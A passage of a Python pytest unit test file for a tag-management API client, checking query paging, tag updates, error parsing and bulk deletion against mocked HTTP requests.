result = await self._uut.query_async(["tag1", "tag2"])
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": "tag1,tag2", "skip": "0"}
)
@pytest.mark.asyncio
async def test__path_with_skip_and_take_supplied__query_async__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = await self._uut.query_async(
["missing1", path1, "missing2", path2, "missing3"], skip=2, take=1
)
assert total_count == result.total_count
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path1 == result.current_page[0].path
assert tbase.DataType.BOOLEAN == result.current_page[0].data_type
paths = ",".join(("missing1", path1, "missing2", path2, "missing3"))
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": paths, "skip": "2", "take": "1"}
)
await result.move_next_page_async()
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path2 == result.current_page[0].path
assert tbase.DataType.DATE_TIME == result.current_page[0].data_type
assert self._client.all_requests.call_args_list == [
mock.call(
"GET",
"/nitag/v2/tags",
params={"path": paths, "skip": "2", "take": "1"},
),
mock.call(
"GET",
"/nitag/v2/tags",
params={"path": paths, "skip": "3", "take": "1"},
),
]
await result.move_next_page_async()
assert result.current_page is None
@pytest.mark.asyncio
async def test__paths_with_keywords_and_properties_supplied__query_async__performs_query(
self,
):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": total_count, "tags": []}]
)
)
result = await self._uut.query_async(
["tag1", "tag2"],
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
)
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"path": "tag1,tag2",
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "0",
},
)
@pytest.mark.asyncio
async def test__only_keywords_and_properties_supplied__query_async__performs_query(
self,
):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": total_count, "tags": []}]
)
)
result = await self._uut.query_async(
None,
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
)
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "0",
},
)
@pytest.mark.asyncio
async def test__all_inputs_supplied__query_async__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = await self._uut.query_async(
["missing1", path1, "missing2", path2, "missing3"],
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
skip=2,
take=1,
)
assert total_count == result.total_count
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path1 == result.current_page[0].path
assert tbase.DataType.BOOLEAN == result.current_page[0].data_type
paths = ",".join(("missing1", path1, "missing2", path2, "missing3"))
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "2",
"take": "1",
},
)
await result.move_next_page_async()
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path2 == result.current_page[0].path
assert tbase.DataType.DATE_TIME == result.current_page[0].data_type
assert self._client.all_requests.call_args_list == [
mock.call(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "2",
"take": "1",
},
),
mock.call(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "3",
"take": "1",
},
),
]
await result.move_next_page_async()
assert result.current_page is None
def test__bad_arguments__update_with_tags__raises(self):
valid_tag = tbase.TagData("tag", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
self._uut.update(None)
with pytest.raises(ValueError):
self._uut.update([])
with pytest.raises(ValueError):
self._uut.update([valid_tag, None])
with pytest.raises(ValueError):
self._uut.update([valid_tag, tbase.TagData(None, tbase.DataType.BOOLEAN)])
with pytest.raises(ValueError):
self._uut.update([valid_tag, tbase.TagData("", tbase.DataType.BOOLEAN)])
with pytest.raises(ValueError):
self._uut.update([valid_tag, tbase.TagData(" ", tbase.DataType.BOOLEAN)])
with pytest.raises(ValueError):
self._uut.update([valid_tag, tbase.TagData("tag2", tbase.DataType.UNKNOWN)])
def test__update_with_tags__metadata_sent_to_server(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
keywords = ["keyword1", "keyword2"]
properties = {"prop1": "value1", "prop2": "value2"}
tag1 = tbase.TagData(path1, tbase.DataType.BOOLEAN, keywords, properties)
tag1.set_retention_days(1)
tag2 = tbase.TagData(path2, tbase.DataType.STRING)
tag2.collect_aggregates = True
all_properties1 = dict(properties)
tag1._copy_retention_properties(all_properties1)
all_properties2 = {}
tag2._copy_retention_properties(all_properties2)
self._uut.update([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-tags",
params=None,
data={
"tags": [
{
"path": path1,
"type": "BOOLEAN",
"keywords": keywords,
"properties": all_properties1,
"collectAggregates": False,
},
{
"path": path2,
"type": "STRING",
"properties": all_properties2,
"collectAggregates": True,
},
],
"merge": False,
},
)
def test__partial_success__update_with_tags__raises(self):
path = "invalid"
error = core.ApiError()
error.name = "Tag.OneOrMoreErrorsOccurred"
error.message = "One or more errors occurred"
inner_errors = [core.ApiError(), core.ApiError()]
inner_errors[0].name = "Tag.InvalidDataType"
inner_errors[0].message = "Invalid data type"
inner_errors[0].resource_type = "tag"
inner_errors[0].resource_id = path
inner_errors[1].name = "Tag.Conflict"
inner_errors[1].message = "Conflict of some sort"
inner_errors[1].resource_type = "tag"
inner_errors[1].resource_id = "another"
error.inner_errors = inner_errors
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"error": {
"name": error.name,
"message": error.message,
"innerErrors": [
{
"name": error.inner_errors[0].name,
"message": error.inner_errors[0].message,
"resourceType": error.inner_errors[0].resource_type,
"resourceId": error.inner_errors[0].resource_id,
},
{
"name": error.inner_errors[1].name,
"message": error.inner_errors[1].message,
"resourceType": error.inner_errors[1].resource_type,
"resourceId": error.inner_errors[1].resource_id,
},
],
}
}
]
)
)
with pytest.raises(core.ApiException) as ex:
self._uut.update([tbase.TagData(path, tbase.DataType.BOOLEAN)])
assert error == ex.value.error
def test__bad_arguments__update_with_tag_updates__raises(self):
validUpdate = tbase.TagDataUpdate.from_tagdata(
tbase.TagData("tag", tbase.DataType.BOOLEAN), tbase.TagUpdateFields.ALL
)
with pytest.raises(ValueError):
self._uut.update(None)
with pytest.raises(ValueError):
self._uut.update([])
with pytest.raises(ValueError):
self._uut.update([validUpdate, None])
with pytest.raises(ValueError):
self._uut.update(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(None, tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
self._uut.update(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData("", tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
self._uut.update(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(" ", tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
self._uut.update(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData("tag2", tbase.DataType.UNKNOWN),
tbase.TagUpdateFields.ALL,
),
]
)
def test__update_with_tag_update__metadata_merge_sent_to_server(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
keywords = ["keyword1", "keyword2"]
properties = {"prop1": "value1", "prop2": "value2"}
tag1 = tbase.TagData(path1, tbase.DataType.BOOLEAN, keywords, properties)
tag1.set_retention_days(1)
tag2 = tbase.TagData(path2, tbase.DataType.STRING)
tag2.collect_aggregates = True
all_properties2 = {}
tag2._copy_retention_properties(all_properties2)
self._uut.update(
[
tbase.TagDataUpdate.from_tagdata(
tag1, tbase.TagUpdateFields.PROPERTIES
),
tbase.TagDataUpdate.from_tagdata(tag2, tbase.TagUpdateFields.ALL),
]
)
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-tags",
params=None,
data={
"tags": [
{"path": path1, "type": "BOOLEAN", "properties": properties},
{
"path": path2,
"type": "STRING",
"properties": all_properties2,
"collectAggregates": True,
},
],
"merge": True,
},
)
def test__partial_success__update_with_tag_updates__raises(self):
path = "invalid"
error = core.ApiError()
error.name = ("Tag.OneOrMoreErrorsOccurred",)
error.message = ("One or more errors occurred",)
inner_errors = [core.ApiError(), core.ApiError()]
inner_errors[0].name = ("Tag.InvalidDataType",)
inner_errors[0].message = ("Invalid data type",)
inner_errors[0].resource_type = ("tag",)
inner_errors[0].resource_id = path
inner_errors[1].name = ("Tag.Conflict",)
inner_errors[1].message = ("Conflict of some sort",)
inner_errors[1].resource_type = ("tag",)
inner_errors[1].resource_id = "another"
error.inner_errors = inner_errors
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"error": {
"name": error.name,
"message": error.message,
"innerErrors": [
{
"name": error.inner_errors[0].name,
"message": error.inner_errors[0].message,
"resourceType": error.inner_errors[0].resource_type,
"resourceId": error.inner_errors[0].resource_id,
},
{
"name": error.inner_errors[1].name,
"message": error.inner_errors[1].message,
"resourceType": error.inner_errors[1].resource_type,
"resourceId": error.inner_errors[1].resource_id,
},
],
}
}
]
)
)
with pytest.raises(core.ApiException) as ex:
self._uut.update(
[
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(path, tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
)
]
)
assert error == ex.value.error
@pytest.mark.asyncio
async def test__bad_arguments__update_async_with_tags__raises(self):
valid_tag = tbase.TagData("tag", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
await self._uut.update_async(None)
with pytest.raises(ValueError):
await self._uut.update_async([])
with pytest.raises(ValueError):
await self._uut.update_async([valid_tag, None])
with pytest.raises(ValueError):
await self._uut.update_async(
[valid_tag, tbase.TagData(None, tbase.DataType.BOOLEAN)]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[valid_tag, tbase.TagData("", tbase.DataType.BOOLEAN)]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[valid_tag, tbase.TagData(" ", tbase.DataType.BOOLEAN)]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[valid_tag, tbase.TagData("tag2", tbase.DataType.UNKNOWN)]
)
@pytest.mark.asyncio
async def test__update_async_with_tags__metadata_sent_to_server(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
keywords = ["keyword1", "keyword2"]
properties = {"prop1": "value1", "prop2": "value2"}
tag1 = tbase.TagData(path1, tbase.DataType.BOOLEAN, keywords, properties)
tag1.set_retention_days(1)
tag2 = tbase.TagData(path2, tbase.DataType.STRING)
tag2.collect_aggregates = True
all_properties1 = dict(properties)
tag1._copy_retention_properties(all_properties1)
all_properties2 = {}
tag2._copy_retention_properties(all_properties2)
await self._uut.update_async([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-tags",
params=None,
data={
"tags": [
{
"path": path1,
"type": "BOOLEAN",
"keywords": keywords,
"properties": all_properties1,
"collectAggregates": False,
},
{
"path": path2,
"type": "STRING",
"properties": all_properties2,
"collectAggregates": True,
},
],
"merge": False,
},
)
@pytest.mark.asyncio
async def test__partial_success__update_async_with_tags__raises(self):
path = "invalid"
error = core.ApiError()
error.name = ("Tag.OneOrMoreErrorsOccurred",)
error.message = ("One or more errors occurred",)
inner_errors = [core.ApiError(), core.ApiError()]
inner_errors[0].name = ("Tag.InvalidDataType",)
inner_errors[0].message = ("Invalid data type",)
inner_errors[0].resource_type = ("tag",)
inner_errors[0].resource_id = path
inner_errors[1].name = ("Tag.Conflict",)
inner_errors[1].message = ("Conflict of some sort",)
inner_errors[1].resource_type = ("tag",)
inner_errors[1].resource_id = "another"
error.inner_errors = inner_errors
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"error": {
"name": error.name,
"message": error.message,
"innerErrors": [
{
"name": error.inner_errors[0].name,
"message": error.inner_errors[0].message,
"resourceType": error.inner_errors[0].resource_type,
"resourceId": error.inner_errors[0].resource_id,
},
{
"name": error.inner_errors[1].name,
"message": error.inner_errors[1].message,
"resourceType": error.inner_errors[1].resource_type,
"resourceId": error.inner_errors[1].resource_id,
},
],
}
}
]
)
)
with pytest.raises(core.ApiException) as ex:
await self._uut.update_async([tbase.TagData(path, tbase.DataType.BOOLEAN)])
assert error == ex.value.error
@pytest.mark.asyncio
async def test__bad_arguments__update_async_with_tag_updates__raises(self):
validUpdate = tbase.TagDataUpdate.from_tagdata(
tbase.TagData("tag", tbase.DataType.BOOLEAN), tbase.TagUpdateFields.ALL
)
with pytest.raises(ValueError):
await self._uut.update_async(None)
with pytest.raises(ValueError):
await self._uut.update_async([])
with pytest.raises(ValueError):
await self._uut.update_async([validUpdate, None])
with pytest.raises(ValueError):
await self._uut.update_async(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(None, tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData("", tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(" ", tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData("tag2", tbase.DataType.UNKNOWN),
tbase.TagUpdateFields.ALL,
),
]
)
@pytest.mark.asyncio
async def test__update_async_with_tag_update__metadata_merge_sent_to_server(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
keywords = ["keyword1", "keyword2"]
properties = {"prop1": "value1", "prop2": "value2"}
tag1 = tbase.TagData(path1, tbase.DataType.BOOLEAN, keywords, properties)
tag1.set_retention_days(1)
tag2 = tbase.TagData(path2, tbase.DataType.STRING)
tag2.collect_aggregates = True
all_properties2 = {}
tag2._copy_retention_properties(all_properties2)
await self._uut.update_async(
[
tbase.TagDataUpdate.from_tagdata(
tag1, tbase.TagUpdateFields.PROPERTIES
),
tbase.TagDataUpdate.from_tagdata(tag2, tbase.TagUpdateFields.ALL),
]
)
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-tags",
params=None,
data={
"tags": [
{"path": path1, "type": "BOOLEAN", "properties": properties},
{
"path": path2,
"type": "STRING",
"properties": all_properties2,
"collectAggregates": True,
},
],
"merge": True,
},
)
@pytest.mark.asyncio
async def test__partial_success__update_async_with_tag_updates__raises(self):
path = "invalid"
error = core.ApiError()
error.name = ("Tag.OneOrMoreErrorsOccurred",)
error.message = ("One or more errors occurred",)
inner_errors = [core.ApiError(), core.ApiError()]
inner_errors[0].name = ("Tag.InvalidDataType",)
inner_errors[0].message = ("Invalid data type",)
inner_errors[0].resource_type = ("tag",)
inner_errors[0].resource_id = path
inner_errors[1].name = ("Tag.Conflict",)
inner_errors[1].message = ("Conflict of some sort",)
inner_errors[1].resource_type = ("tag",)
inner_errors[1].resource_id = "another"
error.inner_errors = inner_errors
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"error": {
"name": error.name,
"message": error.message,
"innerErrors": [
{
"name": error.inner_errors[0].name,
"message": error.inner_errors[0].message,
"resourceType": error.inner_errors[0].resource_type,
"resourceId": error.inner_errors[0].resource_id,
},
{
"name": error.inner_errors[1].name,
"message": error.inner_errors[1].message,
"resourceType": error.inner_errors[1].resource_type,
"resourceId": error.inner_errors[1].resource_id,
},
],
}
}
]
)
)
with pytest.raises(core.ApiException) as ex:
await self._uut.update_async(
[
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(path, tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
)
]
)
assert error == ex.value.error
def test__bad_arguments__delete_tags__raises(self):
with pytest.raises(ValueError):
self._uut.delete(None)
with pytest.raises(ValueError):
self._uut.delete([tbase.TagData("tag"), None])
with pytest.raises(ValueError):
self._uut.delete([tbase.TagData("tag"), tbase.TagData(None)])
with pytest.raises(ValueError):
self._uut.delete([tbase.TagData("tag"), tbase.TagData("")])
with pytest.raises(ValueError):
self._uut.delete([tbase.TagData("tag"), tbase.TagData(" ")])
with pytest.raises(ValueError):
self._uut.delete([tbase.TagData("tag"), tbase.TagData("*")])
def test__delete_tags__deletes_using_paths(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None, None])
)
self._uut.delete(
[tbase.TagData(path1, tbase.DataType.STRING), tbase.TagData(path2)]
)
assert self._client.all_requests.call_args_list == [
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2}),
]
def test__bad_arguments__delete_paths__raises(self):
with pytest.raises(ValueError):
self._uut.delete(None)
with pytest.raises(ValueError):
self._uut.delete(["tag", None])
with pytest.raises(ValueError):
self._uut.delete(["tag", ""])
with pytest.raises(ValueError):
self._uut.delete(["tag", " "])
with pytest.raises(ValueError):
self._uut.delete(["tag", "*"])
def test__empty_list__delete_paths__api_not_called(self):
self._uut.delete([])
assert self._client.all_requests.call_count == 0
def test__small_number_of_paths__delete_paths__separate_deletes_sent_to_server(
self,
):
path1 = "tag1"
path2 = "tag2"
path3 = "tag3"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None] * 6)
)
self._uut.delete([path1])
self._uut.delete([path1, path2])
self._uut.delete([path1, path2, path3])
assert self._client.all_requests.call_args_list == [
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path3}),
]
def test__server_error_with_small_number_of_paths__delete_paths__raises_first_exception(
self,
):
path1 = "tag1"
path2 = "tag2"
path3 = "tag3"
deleteException = core.ApiException("oops")
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
# tag1
deleteException,
# tag1, tag2
None,
deleteException,
# tag1, tag2, tag3
deleteException,
deleteException,
deleteException,
]
)
)
with pytest.raises(core.ApiException) as ex:
self._uut.delete([path1])
assert deleteException is ex.value
with pytest.raises(core.ApiException) as ex:
self._uut.delete([path1, path2])
assert deleteException is ex.value
with pytest.raises(core.ApiException) as ex:
self._uut.delete([path1, path2, path3])
assert deleteException is ex.value
assert self._client.all_requests.call_args_list == [
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2}),
mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path3}),
]
def test__many_paths__delete_paths__temporary_selection_used_for_delete(self):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
else:
return None, MockResponse(method, uri)
self._client.all_requests.configure_mock(side_effect=mock_request)
self._uut.delete(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
def test__server_error_with_many_paths__delete_paths__raises(self):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
createException = core.ApiException("can't create")
deleteException = core.ApiException("can't delete")
self._client.all_requests.configure_mock(side_effect=createException)
with pytest.raises(core.ApiException) as ex:
self._uut.delete(paths)
assert createException is ex.value
# ===
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
elif method == "DELETE":
if uri.endswith("/tags"):
raise deleteException
else:
return None, MockResponse(method, uri)
else:
assert False
self._client.all_requests.configure_mock(side_effect=mock_request)
with pytest.raises(core.ApiException) as ex:
self._uut.delete(paths)
assert deleteException is ex.value
assert self._client.all_requests.call_args_list == [
# From the first attempt
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
# From the second attempt
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
def test__server_error_when_deleting_temp_selection__delete_paths__error_ignored(
self,
):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
elif method == "DELETE":
if not uri.endswith("/tags"):
raise core.ApiException("can't delete selection")
else:
return None, MockResponse(method, uri)
else:
assert False
self._client.all_requests.configure_mock(side_effect=mock_request)
self._uut.delete(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
@pytest.mark.asyncio
async def test__bad_arguments__delete_tags_async__raises(self):
with pytest.raises(ValueError):
await self._uut.delete_async(None)
with pytest.raises(ValueError):
await self._uut.delete_async([tbase.TagData("tag"), None])
with pytest.raises(ValueError):
await self._uut.delete_async([tbase.TagData("tag"), tbase.TagData(None)])
with pytest.raises(ValueError):
await self._uut.delete_async([tbase.TagData("tag"), tbase.TagData("")])
with pytest.raises(ValueError):
await self._uut.delete_async([tbase.TagData("tag"), tbase.TagData(" ")])
with pytest.raises(ValueError):
await self._uut.delete_async([tbase.TagData("tag"), tbase.TagData("*")])
@pytest.mark.asyncio
async def test__delete_tags_async__deletes_using_paths(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None, None])
)
await self._uut.delete_async(
[tbase.TagData(path1, tbase.DataType.STRING), tbase.TagData(path2)]
)
assert sorted(str(c) for c in self._client.all_requests.call_args_list) == [
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2})),
]
@pytest.mark.asyncio
async def test__bad_arguments__delete_paths_async__raises(self):
with pytest.raises(ValueError):
await self._uut.delete_async(None)
with pytest.raises(ValueError):
await self._uut.delete_async(["tag", None])
with pytest.raises(ValueError):
await self._uut.delete_async(["tag", ""])
with pytest.raises(ValueError):
await self._uut.delete_async(["tag", " "])
with pytest.raises(ValueError):
await self._uut.delete_async(["tag", "*"])
@pytest.mark.asyncio
async def test__empty_list__delete_paths_async__api_not_called(self):
await self._uut.delete_async([])
assert self._client.all_requests.call_count == 0
@pytest.mark.asyncio
async def test__small_number_of_paths__delete_paths_async__separate_deletes_sent_to_server(
self,
):
path1 = "tag1"
path2 = "tag2"
path3 = "tag3"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None] * 6)
)
await asyncio.gather(
self._uut.delete_async([path1]),
self._uut.delete_async([path1, path2]),
self._uut.delete_async([path1, path2, path3]),
)
assert sorted(str(c) for c in self._client.all_requests.call_args_list) == [
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path3})),
]
@pytest.mark.asyncio
async def test__server_error_with_small_number_of_paths__delete_paths_async__raises_first_exception(
self,
):
path1 = "tag1"
path2 = "tag2"
path3 = "tag3"
deleteException = core.ApiException("oops")
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
# tag1
deleteException,
# tag1, tag2
None,
deleteException,
# tag1, tag2, tag3
deleteException,
deleteException,
deleteException,
]
)
)
with pytest.raises(core.ApiException) as ex:
await self._uut.delete_async([path1])
assert deleteException is ex.value
with pytest.raises(core.ApiException) as ex:
await self._uut.delete_async([path1, path2])
assert deleteException is ex.value
with pytest.raises(core.ApiException) as ex:
await self._uut.delete_async([path1, path2, path3])
assert deleteException is ex.value
assert sorted(str(c) for c in self._client.all_requests.call_args_list) == [
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path1})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path2})),
str(mock.call("DELETE", "/nitag/v2/tags/{path}", params={"path": path3})),
]
@pytest.mark.asyncio
async def test__many_paths__delete_paths_async__temporary_selection_used_for_delete(
self,
):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
else:
return None, MockResponse(method, uri)
self._client.all_requests.configure_mock(side_effect=mock_request)
await self._uut.delete_async(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
@pytest.mark.asyncio
async def test__server_error_with_many_paths__delete_paths_async__raises(self):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
createException = core.ApiException("can't create")
deleteException = core.ApiException("can't delete")
self._client.all_requests.configure_mock(side_effect=createException)
with pytest.raises(core.ApiException) as ex:
await self._uut.delete_async(paths)
assert createException is ex.value
# ===
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
elif method == "DELETE":
if uri.endswith("/tags"):
raise deleteException
else:
return None, MockResponse(method, uri)
else:
assert False
self._client.all_requests.configure_mock(side_effect=mock_request)
with pytest.raises(core.ApiException) as ex:
await self._uut.delete_async(paths)
assert deleteException is ex.value
assert self._client.all_requests.call_args_list == [
# From the first attempt
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
# From the second attempt
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
@pytest.mark.asyncio
async def test__server_error_when_deleting_temp_selection__delete_paths_async__error_ignored(
self,
):
token = "selection for delete"
paths = ["tag1", "tag2", "tag3", "tag4"]
def mock_request(method, uri, data=None, **kwargs):
if data is not None:
return (
{"id": token, "searchPaths": data.get("searchPaths")},
MockResponse(method, uri),
)
elif method == "DELETE":
if not uri.endswith("/tags"):
raise core.ApiException("can't delete selection")
else:
return None, MockResponse(method, uri)
else:
assert False
self._client.all_requests.configure_mock(side_effect=mock_request)
await self._uut.delete_async(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": paths, "inactivityTimeout": 30},
),
mock.call("DELETE", "/nitag/v2/selections/{id}/tags", params={"id": token}),
mock.call("DELETE", "/nitag/v2/selections/{id}", params={"id": token}),
]
def test__bad_arguments__create_writer__raises(self):
with pytest.raises(ValueError):
self._uut.create_writer(buffer_size=0)
with pytest.raises(ValueError):
self._uut.create_writer(max_buffer_time=timedelta(0))
with pytest.raises(ValueError):
self._uut.create_writer(buffer_size=0, max_buffer_time=timedelta(minutes=1))
with pytest.raises(ValueError):
self._uut.create_writer(buffer_size=1, max_buffer_time=timedelta(0))
